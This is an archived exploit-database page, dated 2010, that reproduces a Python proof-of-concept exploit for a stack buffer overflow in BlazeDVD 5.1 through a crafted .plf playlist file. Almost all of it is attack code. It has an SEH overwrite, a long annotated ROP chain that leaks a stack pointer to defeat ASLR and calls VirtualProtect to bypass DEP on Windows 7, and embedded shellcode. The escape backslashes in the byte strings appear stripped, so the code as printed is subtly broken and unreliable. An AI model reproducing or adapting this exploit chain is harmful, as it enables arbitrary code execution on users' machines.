
BlazeDVD v5.1 (.plf) Stack Buffer Overflow PoC Exploit - ASLR/DEP Bypass

Posted on 17 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>BlazeDVD v5.1 (.plf) Stack Buffer Overflow PoC Exploit - ASLR/DEP Bypass</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================================================== BlazeDVD v5.1 (.plf) Stack Buffer Overflow PoC Exploit - ASLR/DEP Bypass ======================================================================== #!/usr/bin/python # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # BlazeDVD v5.1 (.plf) Stack Buffer Overflow PoC exploit - ASLR/DEP bypass on win7 # Author: mr_me - https://net-ninja.net - mr_me[AT]corelan.be - @StevenSeeley # Download: http://www.blazevideo.com/ # Tested on windows 7 version N - DEP = AlwaysOn # Greetz: Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # This PoC demonstrates how we can bypass ASLR by stealing a # pointer off the stack and calculating the offset. # Then set up the VirtualProtect() call and execute it to bypass DEP as well. # All addresses are from non-ASLR-protected modules shipped with BlazeDVD. # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. 
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # write-up here: http://net-ninja.net/blog/?p=124 def banner(): print &quot;|------------------------------------------------------------------|&quot; print &quot;| __ __ |&quot; print &quot;| _________ ________ / /___ _____ / /____ ____ _____ ___ |&quot; print &quot;| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |&quot; print &quot;| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |&quot; print &quot;| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |&quot; print &quot;| |&quot; print &quot;|-------------------------------------------------[ EIP Hunters ]--|&quot; print &quot;[+] BlazeDVD v5.1 (plf) Stack Buffer Overflow PoC exploit - ALSR/DEP bypass on win7&quot; # MessageBoxA - &quot;mr_me defeats ASLR &amp; DEP !&quot; sc = (&quot;xbfx3ax13x11xddxd9xc8x33xc9xb1x4bxd9x74x24&quot; &quot;xf4x5bx31x7bx14x83xebxfcx03x7bx10xd8xe6xc8&quot; &quot;x36x87xd0x9fxecx43xd3x8dx5fxd1x25xfbxc4xae&quot; &quot;x37xcbx8fxc6xbbxa0xe6x3ax4fxf0x0exc9x31xdd&quot; &quot;x85xfbxf5x52x82x76xf5x34xb3xa9x06x27xd3xc2&quot; &quot;x95x8cx30x5fx20xf1xb3x0bxaex71xc5x59x3bxcb&quot; &quot;xddx16x66xecxdcxc3x74xdbx97x98x4fxafx29x70&quot; &quot;x9ex50x18x4cx1dx02xdfx8cxaax51x21xc3x5ex67&quot; &quot;x66x32x91x98x97x3bx69x1bx4cxebxfbx3dx07xb1&quot; &quot;x27xc3xf3x23xa3xcfx48x20xe9xd3x4fxddx85xe8&quot; &quot;xc4x20x72x79x9ex06x9ex1bxdcxf4x96xf2x36x71&quot; &quot;x43x8dx75xe9x02xc0x77x05x48x35x1bx2ax92x3a&quot; &quot;xadx91x69x7exd0xc1x90xf3xaaxedx70xa6x5cx86&quot; &quot;x86xb9x62x11x3dx4exf5x4dxd2x6exfaxe5x19x5d&quot; &quot;x2ax91x35xd4x41x3cxb4x9exfax9ax32x16xe4xb4&quot; &quot;xbdx7dxedxb1x80x2ex56x69xa6x82x14xeexbbx38&quot; &quot;x37x18x9dxbfx48x27x4ax2dxefxf7xabxc5x2fxa3&quot; &quot;xcex74x58x39x78x03xe1xd5x29x8ex72x50xa6x3c&quot; &quot;x14xf4x16xd5x95x67x25x40x2bxacx41xd6x6fx47&quot; &quot;xdbx04x07x47xfax92xf8xefxdcx66xbcxbfx74x2b&quot; &quot;x6cx1fxa3xdbxe3x7fxeax48x6cx19x89x0fx18x8d&quot; 
&quot;x34xf0x84x28xdfx9dx36xedx72x6fx7ex99xc1xab&quot; &quot;x9ax10x38x82x48x70xe8xb4x3ex8bxdex06x7fx23&quot; &quot;x20x3dx77&quot;) junk = 'x43' * 312 ## This is where we land after our stack pivot ## rop2 = 'xe7x57x60x61' # 0x616057E7 : # MOV AX,100 # RETN rop2 += 'x41x41x41x41' # JUNK rop2 += 'x9fxa5x62x61' * 73 # 0x6162A59F : # ADD EAX,20 # POP EBX # RETN rop2 += 'x44' * (612-len(junk)-len(rop2)) seh = 'xaex74x60x61' # 0x616074AE : # ADD ESP,408 # RETN 4 ## leak ptr off the stack and calculate the offset for VirtualProtect() ## rop = 'x9fxa5x62x61' * 62 # 0x6162A59F : # ADD EAX,20 # POP EBX # RETN rop += 'xf0x8dx62x61' * 2 # 0x61628DF0 : # ADD EAX,0c # RETN rop += 'xe3xd8x01x64' # 0x6401D8E3 : # POP EDI # RETN rop += 'x1bx10x10x64' # 0x6410101B : # POP ESI # RETN rop += 'x3bxf9x60x61' # 0x6160F93B : # MOV EBX,EAX # CALL EDI rop += 'x74x0cx32x60' # 0x60320C74 : # SUB EBP,EBX # OR ESI,ESI # RETN rop += 'x27x7ex01x64' # 0x64017E27 : # XOR EAX,EAX # RETN rop += 'xe1x67x01x64' # 0x640167E1 : # ADD EAX,EBP # RETN 2 rop += 'x4dxb2x10x64' # 0x6410B24D : # MOV EAX,DWORD PTR DS:[EAX] # RETN rop += 'x41x41' # JUNK --------------------------^^ rop += 'x3exa0x10x64' # 0x6410A03E : # MOV EDX,EBX # JMP SHORT NetReg.6410A083 --&gt; # PPR # RETN 10 rop += 'x41x41x41x41' # JUNK (for the p/p/r) rop += 'x41x41x41x41' # JUNK (for the p/p/r) rop += 'x05x6cx02x64' # 0x64026C05 : # SUB EAX,EDX # RETN rop += 'x41x41x41x41' # JUNK ---------------------------------------------------------------^^ rop += 'x41x41x41x41' # JUNK rop += 'x41x41x41x41' # JUNK rop += 'x41x41x41x41' # JUNK rop += 'x05x6cx02x64' * 14 # 0x64026C05 : # SUB EAX,EDX # RETN rop += 'x24x41x60x61' * 88 # 0x61604124 : # ADD EAX,20 # RETN 4 rop += 'x41x41x41x41' # JUNK ------------------------^^ rop += 'x97x7dx03x64' * 6 # 0x64037D97 : # ADD EAX,-2 # RETN ## Setup the VirtualProtect() call ## rop += 'xa2x8bx60x61' # 0x61608BA2 : # XCHG EAX,EDX # RETN rop += 'x27x7ex01x64' # 0x64017E27 : # XOR EAX,EAX # RETN rop += 
'x59x9fx03x64' * 6 # 0x64039F59 : # ADD EAX,0C # RETN rop += 'x97x7dx03x64' * 4 # 0x64037D97 : # ADD EAX,-2 # RETN rop += 'xa2x8bx60x61' # 0x61608BA2 : # XCHG EAX,EDX # RETN rop += 'x24x01x64x61' # 0x61640124 : # XCHG EAX,EBX # RETN rop += 'x27x7ex01x64' # 0x64017E27 : # XOR EAX,EAX # RETN ## Calculate shellcode space ## rop += 'x59x9fx03x64' * 65 # 0x64039F59 : # ADD EAX,0C # RETN rop += 'x24x01x64x61' # 0x61640124 : # XCHG EAX,EBX # RETN rop += 'xe3xd8x01x64' # 0x6401D8E3 : # POP EDI # RETN rop += 'x1cx10x10x64' # 0x6410101C : # RETN (ROP NOP) rop += 'x7exa9x60x61' # 0x6160A97E : # XCHG EAX,EBP # RETN rop += 'x27x7ex01x64' # 0x64017E27 : # XOR EAX,EAX # RETN rop += 'x74x58x02x64' # 0x64025874 : # PUSH ESP # POP ESI # RETN rop += 'x60x8fx32x60' # 0x60328F60 : # MOV EAX,ESI # POP ESI # RETN 4 rop += 'x71x97x32x60' # 0x60329771 : # CALL EAX # JUNK --^^ rop += 'x59x9fx03x64' # 0x64039F59 : # ADD EAX,0C # RETN rop += 'x41x41x41x41' # JUNK ------------------------------------^^ rop += 'x59x9fx03x64' * 5 # 0x64039F59 : # ADD EAX,0C # RETN rop += 'xf1x2ax10x64' # 0x64102AF1 : # POP ECX # RETN rop += 'x80xb1x11x64' # 0x6411b180 : # A writeable location from .data rop += 'x7exa9x60x61' # 0x6160A97E : # XCHG EAX,EBP # RETN rop += 'x07x40x63x61' # 0x61634007 : # XCHG EAX,ESI # AND EAX,C95E0000 # RETN 0C rop += 'x31x08x62x61' # 0x61620831 : # PUSHAD # RETN nops = &quot;x90&quot; * 30 exploit = junk + rop2 + seh + rop + nops + sc print &quot;[+] cst-blazedvd.pl exploit file created!&quot; file=open('cst-blazedvd.plf','w') file.write(exploit) file.close() # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-17]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." 

 
